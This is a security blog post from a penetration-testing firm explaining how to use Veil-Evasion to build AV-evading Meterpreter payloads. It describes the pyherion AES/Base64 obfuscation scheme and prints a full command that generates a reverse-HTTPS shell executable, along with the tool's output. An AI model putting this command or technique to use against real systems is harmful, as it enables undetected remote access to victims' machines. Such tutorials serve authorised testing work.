NetSPI Blog

Bypassing AV with Veil-Evasion

Ryan Gandrud
July 14th, 2014

Veil-Framework is a collection of tools that help with information gathering and post-exploitation. One such tool is Veil-Evasion which is used for creating payloads that can easily bypass Antivirus using known and documented techniques. This is done through an array of encoding schemes that change the signatures of files dramatically enough to avoid standard detection techniques. You can download the framework by visiting the Veil Framework Github.

Generating obfuscated payloads

During penetration tests, if a box has Antivirus installed, dropping and executing simple meterpreter binaries is more than likely going to be caught. In this case, you need to encode the binary. There are a couple of built in encoders in Metasploit (shikata ga nai is the most popular one), but these signatures have been updated in many Antivirus solutions, resulting in detection.

A way to get around this is to use Veil-Evasion. This tool comes with thirty different payloads in C, C#, PowerShell, and Python languages. I almost always use the Python versions, simply because it was the only language in Veil-Evasion that supported Meterpreter reverse HTTPS connections (until recently). This is beneficial for shells because everything will be encrypted with SSL, preventing the commands and results from being transmitted in the clear and potentially being discovered by an IDS or IPS system. Another benefit of using Python is the ability to make contained payloads. This means that all the Meterpreter code needed for the reverse https connection is already included instead of only being a stager that downloads the rest of the code to run.

When you select the Python language within Veil-Evasion, Veil creates executables by utilizing Wine. Specifically, it uses the py2exe and/or pyinstaller for compilation.. If you feel as though the normal encoding isn't quite enough, you can also use pyherion encoding. The pyherion option causes Veil to AES encrypt the payload with a random key. One of the benefits of Python is that you are able to dynamically execute functions. Using this technique, you can encrypt the source code using AES, then execute the code during runtime by calling the AES decryption function. This randomizes the original source code, making fingerprinting by AV more difficult. However, the decryption function of the code is still static (Exec(“…). To solve this problem, the source code is Base64 encoded and wrapped in another exec call to obscure the decrypt function. Veil then obfuscates the required imports for AES and Base64 by using random names. In the end, you are left with dynamic execution of a Base64 encoded, AES encrypted payload which is almost completely randomized per generation. For more information on pyherion, visit the Veil team's blog.

Veil-Evasion also has command line switches that allow for easy scripting. This makes it dead simple to generate dynamic Veil-encoded Meterpreter payloads. Below is an example of a python reverse_https_contained Meterpreter executable using pyherion encoding being generated through the command line:

root@kali:/# /root/tools/Github/Veil/Veil-Evasion/ -p python/meterpreter/rev_https_contained -c LHOST= LPORT=443 use_pyherion=Y --overwrite -o malicious =========================================================================  Veil-Evasion | [Version]: 2.9.0 =========================================================================  [Web]: | [Twitter]: @VeilFramework =========================================================================    [*] Executable written to: /root/veil-output/compiled/malicious.exe   Language:              python  Payload:               python/meterpreter/rev_https_contained  Required Options:      LHOST=  LPORT=443  compile_to_exe=Y                         inject_method=virtual  use_pyherion=Y  Payload File:          /root/veil-output/source/  Handler File:          /root/veil-output/handlers/malicious_handler.rc    [*] Your payload files have been generated, don't get caught!  [!] And don't submit samples to any online scanner! ;)

Using this exe, you can now easily execute your Meterpreter code with a very low chance of being caught by AV.

Newest Most Voted
Inline Feedbacks
View all comments
6 years ago

Thank you for the concise introduction to the Veil-Evader. Was wondering if custom payloads (outside metasploit) can be encrypted to make them bypass the AV.

5 years ago

Dear Team,
When run i am getting error “necessary install component missing files”
Please suggest